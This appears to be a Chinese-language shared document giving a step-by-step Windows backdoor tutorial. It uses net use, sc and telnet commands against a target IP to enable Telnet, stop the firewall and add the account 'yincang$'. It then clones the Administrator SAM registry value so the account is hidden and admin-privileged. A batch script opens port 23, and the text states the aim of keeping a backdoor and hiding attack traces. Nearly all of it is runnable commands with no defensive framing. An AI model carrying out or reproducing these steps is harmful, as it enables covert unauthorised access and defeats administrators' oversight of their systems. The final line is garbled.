Telnet建立隐藏账户.docxVIP

telnet建立隐藏账户使用管理员账户建立IPC连接c:\net use \\10.10.10.1 password /user:user获取目标计算机服务列表，并保存到本地c:\sc \\10.10.10.1 query type= service state= all c:\1.txt查看目标计算机服务配置信息c:\sc \\10.10.10.1 qc 服务名称去除Telnet服务的禁用状态，设置为自动运行c:\sc \\10.10.10.1 config tlntsvr start= autoc:\sc \\10.10.10.1 start tlntsvr开户Secondary Logon服务C:\sc \\10.10.10.1 start seclogon停用目标计算机的Windows防火墙，如果不停止Windows防火墙将无法用不用Telnet管理目标计算机。c:\sc \\10.10.10.1 stop SharedAccess确认目标计算机启用了远程注册表服务，如果没启用则将其启动c:\sc \\10.10.10.1 qc remoteregistry建立Telnet连接，并添加隐藏账户“yincang$”“$”符号用于在命令行里隐藏账户，但是在图形管理工具里该账户还是可见的。c:\telnet 10.10.10.1c:\net user yincang$ 123 /add在本地计算机运行“regedt32”，在“注册表编辑器中”中选择“文件”→“连接网络注册表”在选择计算机的窗口中输入目标计算机的地址，并提供目标计算机的用户名和密码打开目标计算机的注册表，右击“HKEY_LOCAL_MACHINE”项下“SAM”子项下的“SAM”子项，选择权限在SAM的权限窗口中，赋予管理员完全控制权限。断开与目标计算机注册表的连接，然后重新建立连接。展开目标计算机的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”项，找到“Administrator”和新建的账户“yincang$”，记录他们的类型。本例中“Administrator”的类型为“0x1f4”，“yincang$”的类型为“0x3ee”。展开目标计算机的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”项下后三位是1F4的子项，该项和“Administrator”相对应。双击右侧窗格1F4项下的F键值，复制F键值下的全部数据。展开目标计算机的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”项下后三位是3EE的子项，使用从1F4项复制的数据覆盖3EE项F键值的数据。导出目标计算机注册表的“yincang$”项和000003EE项保存到本地，分别命名为yincang.reg和3ee.reg ，然后将yincang.reg和3ee.reg拷贝到\\10.10.10.1\C$下。返回到telnet命令行。删除目标计算机的账户“yincang$”。\net user yincang$ /delete在目标计算机上导入yincang.reg和3ee.reg，完成本步后将真正在目标计算机上建立一个隐藏账户，使用命令行和图形工具都不能看见该账户，但在注册表中可以看见。c:\reg import yincang.regc:\reg import 3ee.reg删除目前和目标计算机的IPC连接，使用新建的隐藏账户建立IPC连接，测试该账户是否建立正确并有足够的权限c:\net use \\10.10.10.1 /deletec:\net use \\10.10.10.1 123 /user:yincang$打开目标计算机的注册表，右击HKEY_LOCAL_MACHINE\SAM\SAM子项选择“权限”去除管理员组的读取和完全控制权限，恢复到默认状态。保留管理后门、隐藏攻击痕迹。在本地建立一个名为open23.bat的脚本文件文件内容如下sc start sharedaccessnetsh firewall add portopening all 23 enable:end将open23.bat文件拷贝到\\10.10.10.1\C$下。建立telnet连接，进入目标计算机的C盘运行open23.bat脚本，运行成功后将重新开户Windows防火墙，并且开户TCP和UDP的23端口以允许telnet连接通过防火墙。其它常用命令c:\net use \\IP\IPC$“” /user:”””“””””